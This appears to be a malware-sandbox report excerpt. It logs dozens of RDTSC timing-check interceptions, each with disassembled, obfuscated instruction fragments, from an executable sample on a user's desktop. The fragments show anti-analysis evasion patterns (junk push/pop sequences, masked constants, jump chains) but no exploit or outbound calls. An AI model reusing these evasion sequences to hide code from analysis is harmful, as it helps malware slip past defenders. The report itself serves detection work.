                Source: C:\Users\user\Desktop\LP4a6BowQN.exe | RDTSC instruction interceptor: First address: 9BB59F second address: 9BB5AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe | RDTSC instruction interceptor: First address: 9BB5AA second address: 9BB5C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 jl 00007FC8BCFEEF18h 0x0000000e push eax 0x0000000f push edx 0x00000010 jno 00007FC8BCFEEF06h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe | RDTSC instruction interceptor: First address: 9BB5C0 second address: 9BB5C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe | RDTSC instruction interceptor: First address: 9BB691 second address: 9BB6A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8BCFEEF10h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe | RDTSC instruction interceptor: First address: 9BB6FB second address: 9BB72E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop ecx 0x00000006 mov dword ptr [esp], eax 0x00000009 mov dword ptr [ebp+122D1EEDh], esi 0x0000000f push 00000000h 0x00000011 mov di, 6F78h 0x00000015 push 20362766h 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d jmp 00007FC8BCD07025h 0x00000022 pop eax 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe | RDTSC instruction interceptor: First address: 9BB72E second address: 9BB739 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007FC8BCFEEF06h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe | RDTSC instruction interceptor: First address: 9BB739 second address: 9BB772 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xor dword ptr [esp], 203627E6h 0x0000000e mov edi, esi 0x00000010 push 00000003h 0x00000012 mov edi, dword ptr [ebp+122D38E6h] 0x00000018 push 00000000h 0x0000001a push 00000003h 0x0000001c mov dword ptr [ebp+122D2F14h], edi 0x00000022 call 00007FC8BCD07019h 0x00000027 push eax 0x00000028 push edx 0x00000029 jp 00007FC8BCD0701Ch 0x0000002f jg 00007FC8BCD07016h 0x00000035 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe | RDTSC instruction interceptor: First address: 9BB772 second address: 9BB778 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe | RDTSC instruction interceptor: First address: 9BB778 second address: 9BB77C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe | RDTSC instruction interceptor: First address: 9BB77C second address: 9BB7A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007FC8BCFEEF17h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe | RDTSC instruction interceptor: First address: 9BB7A1 second address: 9BB7A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe | RDTSC instruction interceptor: First address: 9BB7A5 second address: 9BB7B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pushad 0x0000000f popad 0x00000010 pop ecx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe | RDTSC instruction interceptor: First address: 9BB7B6 second address: 9BB7F8 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC8BCD0702Bh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c push eax 0x0000000d push edx 0x0000000e jnc 00007FC8BCD0702Fh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe | RDTSC instruction interceptor: First address: 9BB7F8 second address: 9BB81E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8BCFEEF0Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007FC8BCFEEF0Eh 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe | RDTSC instruction interceptor: First address: 9BB81E second address: 9BB823 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe | RDTSC instruction interceptor: First address: 9BB8C6 second address: 9BB920 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC8BCFEEF06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pop ebx 0x0000000e popad 0x0000000f mov dword ptr [esp], eax 0x00000012 push 00000000h 0x00000014 push ebp 0x00000015 call 00007FC8BCFEEF08h 0x0000001a pop ebp 0x0000001b mov dword ptr [esp+04h], ebp 0x0000001f add dword ptr [esp+04h], 0000001Dh 0x00000027 inc ebp 0x00000028 push ebp 0x00000029 ret 0x0000002a pop ebp 0x0000002b ret 0x0000002c push 00000000h 0x0000002e push esi 0x0000002f jmp 00007FC8BCFEEF14h 0x00000034 pop ecx 0x00000035 push 3CF2C074h 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f popad 0x00000040 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe | RDTSC instruction interceptor: First address: 9BB920 second address: 9BB924 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe | RDTSC instruction interceptor: First address: 9BB924 second address: 9BB92A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe | RDTSC instruction interceptor: First address: 9BB92A second address: 9BB992 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC8BCD07020h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xor dword ptr [esp], 3CF2C0F4h 0x00000011 stc 0x00000012 push 00000003h 0x00000014 call 00007FC8BCD0701Dh 0x00000019 movzx esi, si 0x0000001c pop edi 0x0000001d jmp 00007FC8BCD0701Dh 0x00000022 push 00000000h 0x00000024 mov dl, 1Bh 0x00000026 push 00000003h 0x00000028 mov dx, 81F6h 0x0000002c push 8B140617h 0x00000031 push eax 0x00000032 push edx 0x00000033 push esi 0x00000034 jmp 00007FC8BCD07029h 0x00000039 pop esi 0x0000003a rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe | RDTSC instruction interceptor: First address: 9CD9F2 second address: 9CD9FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe | RDTSC instruction interceptor: First address: 9CD9FB second address: 9CDA01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe | RDTSC instruction interceptor: First address: 9DB796 second address: 9DB79A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe | RDTSC instruction interceptor: First address: 9DB79A second address: 9DB7AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8BCD0701Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe | RDTSC instruction interceptor: First address: 9DB7AA second address: 9DB7B6 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC8BCFEEF0Eh 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe | RDTSC instruction interceptor: First address: 9DB948 second address: 9DB94E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe | RDTSC instruction interceptor: First address: 9DB94E second address: 9DB953 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe | RDTSC instruction interceptor: First address: 9DBEA3 second address: 9DBEA9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe | RDTSC instruction interceptor: First address: 9DBFC7 second address: 9DBFCB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe | RDTSC instruction interceptor: First address: 9DC430 second address: 9DC467 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC8BCD07016h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007FC8BCD07023h 0x00000011 pushad 0x00000012 jnc 00007FC8BCD07016h 0x00000018 pushad 0x00000019 popad 0x0000001a jp 00007FC8BCD07016h 0x00000020 popad 0x00000021 push eax 0x00000022 push edx 0x00000023 jg 00007FC8BCD07016h 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe | RDTSC instruction interceptor: First address: 9D19AB second address: 9D19B1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe | RDTSC instruction interceptor: First address: 9D19B1 second address: 9D19BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe | RDTSC instruction interceptor: First address: 9D19BA second address: 9D19C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe | RDTSC instruction interceptor: First address: 9D19C2 second address: 9D19C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe | RDTSC instruction interceptor: First address: 9D19C8 second address: 9D19E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FC8BCFEEF15h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe | RDTSC instruction interceptor: First address: 9AEEB2 second address: 9AEEEA instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC8BCD0701Eh 0x00000008 jne 00007FC8BCD0701Ch 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jns 00007FC8BCD07018h 0x00000018 pushad 0x00000019 popad 0x0000001a jmp 00007FC8BCD07020h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe | RDTSC instruction interceptor: First address: 9DD0E3 second address: 9DD0E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe | RDTSC instruction interceptor: First address: 9DD0E7 second address: 9DD128 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FC8BCD0701Ah 0x0000000c jmp 00007FC8BCD07026h 0x00000011 jmp 00007FC8BCD07029h 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe | RDTSC instruction interceptor: First address: 9DD3AA second address: 9DD3AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe | RDTSC instruction interceptor: First address: 9DD3AE second address: 9DD3DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a pop eax 0x0000000b pop ebx 0x0000000c je 00007FC8BCD07018h 0x00000012 jmp 00007FC8BCD07022h 0x00000017 popad 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe | RDTSC instruction interceptor: First address: 9DD3DA second address: 9DD3DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe | RDTSC instruction interceptor: First address: 9DD3DE second address: 9DD3FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8BCD07023h 0x00000007 jc 00007FC8BCD07016h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe | RDTSC instruction interceptor: First address: 9DFBBA second address: 9DFBEC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jbe 00007FC8BCFEEF08h 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 pop edx 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 jg 00007FC8BCFEEF12h 0x0000001c mov eax, dword ptr [eax] 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 pushad 0x00000022 popad 0x00000023 pushad 0x00000024 popad 0x00000025 popad 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe | RDTSC instruction interceptor: First address: 9DFD60 second address: 9DFD6A instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC8BCD0701Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe | RDTSC instruction interceptor: First address: 9E35E2 second address: 9E35E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe | RDTSC instruction interceptor: First address: 9E8647 second address: 9E8652 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop esi 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe | RDTSC instruction interceptor: First address: 9E87C4 second address: 9E87CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe | RDTSC instruction interceptor: First address: 9E8D6C second address: 9E8D8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FC8BCD07016h 0x0000000a jmp 00007FC8BCD07028h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe | RDTSC instruction interceptor: First address: 9E8D8E second address: 9E8DA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC8BCFEEF11h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe | RDTSC instruction interceptor: First address: 9E9091 second address: 9E9097 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe | RDTSC instruction interceptor: First address: 9EB286 second address: 9EB297 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jnp 00007FC8BCFEEF0Eh 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe | RDTSC instruction interceptor: First address: 9EB30E second address: 9EB318 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC8BCD07016h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe | RDTSC instruction interceptor: First address: 9EB318 second address: 9EB362 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC8BCFEEF08h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007FC8BCFEEF14h 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 push ecx 0x00000017 jmp 00007FC8BCFEEF18h 0x0000001c pop ecx 0x0000001d mov eax, dword ptr [eax] 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 jne 00007FC8BCFEEF06h 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe | RDTSC instruction interceptor: First address: 9EB362 second address: 9EB379 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8BCD0701Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe | RDTSC instruction interceptor: First address: 9EB379 second address: 9EB38F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jl 00007FC8BCFEEF06h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe | RDTSC instruction interceptor: First address: 9EB38F second address: 9EB395 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe | RDTSC instruction interceptor: First address: 9EB5DD second address: 9EB5E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe | RDTSC instruction interceptor: First address: 9EB6B4 second address: 9EB6BE instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FC8BCD07016h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe | RDTSC instruction interceptor: First address: 9EB789 second address: 9EB78D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe | RDTSC instruction interceptor: First address: 9EC0C7 second address: 9EC0CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe | RDTSC instruction interceptor: First address: 9EC0CB second address: 9EC0D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007FC8BCFEEF0Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe | RDTSC instruction interceptor: First address: 9EC3ED second address: 9EC3F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe | RDTSC instruction interceptor: First address: 9EC3F1 second address: 9EC3F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe | RDTSC instruction interceptor: First address: 9ECAB4 second address: 9ECAB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe | RDTSC instruction interceptor: First address: 9ECAB8 second address: 9ECABE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe | RDTSC instruction interceptor: First address: 9ED46A second address: 9ED46E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe | RDTSC instruction interceptor: First address: 9ED46E second address: 9ED48B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8BCFEEF11h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jc 00007FC8BCFEEF06h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe | RDTSC instruction interceptor: First address: 9ED48B second address: 9ED4FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8BCD07022h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d jns 00007FC8BCD07034h 0x00000013 add di, 6A4Ah 0x00000018 push 00000000h 0x0000001a mov edi, 4331D629h 0x0000001f movsx esi, cx 0x00000022 push 00000000h 0x00000024 mov edi, eax 0x00000026 xchg eax, ebx 0x00000027 jnc 00007FC8BCD07023h 0x0000002d push eax 0x0000002e pushad 0x0000002f push esi 0x00000030 pushad 0x00000031 popad 0x00000032 pop esi 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9ED4FA second address: 9ED4FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9EF5FE second address: 9EF602 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9F08A4 second address: 9F08B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC8BCFEEF10h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9F13CC second address: 9F13E7 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC8BCD07016h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FC8BCD0701Bh 0x0000000f popad 0x00000010 push eax 0x00000011 pushad 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9F13E7 second address: 9F13ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9F2946 second address: 9F2950 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC8BCD07016h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9F2950 second address: 9F2956 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9F3423 second address: 9F34B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8BCD0701Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FC8BCD07020h 0x0000000e popad 0x0000000f push eax 0x00000010 jl 00007FC8BCD0701Ah 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 pop edx 0x0000001a nop 0x0000001b push 00000000h 0x0000001d push ebx 0x0000001e call 00007FC8BCD07018h 0x00000023 pop ebx 0x00000024 mov dword ptr [esp+04h], ebx 0x00000028 add dword ptr [esp+04h], 00000014h 0x00000030 inc ebx 0x00000031 push ebx 0x00000032 ret 0x00000033 pop ebx 0x00000034 ret 0x00000035 xor dword ptr [ebp+122D2472h], ebx 0x0000003b mov dword ptr [ebp+122D2D4Ah], edx 0x00000041 push 00000000h 0x00000043 sbb edi, 221D04EBh 0x00000049 push 00000000h 0x0000004b push 00000000h 0x0000004d push ebx 0x0000004e call 00007FC8BCD07018h 0x00000053 pop ebx 0x00000054 mov dword ptr [esp+04h], ebx 0x00000058 add dword ptr [esp+04h], 00000019h 0x00000060 inc ebx 0x00000061 push ebx 0x00000062 ret 0x00000063 pop ebx 0x00000064 ret 0x00000065 mov dword ptr [ebp+1247FA99h], ecx 0x0000006b xchg eax, ebx 0x0000006c push eax 0x0000006d push edx 0x0000006e push ebx 0x0000006f pushad 0x00000070 popad 0x00000071 pop ebx 0x00000072 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9F34B3 second address: 9F34CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC8BCFEEF18h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9F4FEA second address: 9F4FF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9F3D6C second address: 9F3D7B instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC8BCFEEF06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9F4FF0 second address: 9F5015 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8BCD07029h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9AB926 second address: 9AB92C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9AB92C second address: 9AB931 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9AB931 second address: 9AB938 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
